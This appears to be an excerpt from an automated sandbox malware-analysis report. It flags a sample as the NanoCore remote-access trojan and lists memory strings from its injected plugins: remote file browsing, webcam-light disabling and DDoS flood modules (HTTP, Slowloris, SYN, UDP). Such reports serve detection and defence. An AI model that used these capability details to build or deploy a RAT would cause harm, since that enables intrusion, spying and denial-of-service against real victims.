Source: boaliim.dat	Binary or memory string: WIN_XPe
Source: boaliim.dat	Binary or memory string: WIN_VISTA
Source: boaliim.dat	Binary or memory string: WIN_7
Source: boaliim.dat	Binary or memory string: WIN_8

Remote Access Functionality

Detected Nanocore Rat

Source: boaliim.dat, 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: boaliim.dat, 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: boaliim.dat, 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: boaliim.dat, 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: boaliim.dat, 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: boaliim.dat, 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: boaliim.dat, 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: RegSvcs.exe, 0000000D.00000002.651409238.0000000007B00000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651594442.0000000007B30000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: RegSvcs.exe, 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: RegSvcs.exe, 0000000D.00000002.649689117.0000000006E80000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: RegSvcs.exe, 0000000D.00000002.650948551.0000000007A60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
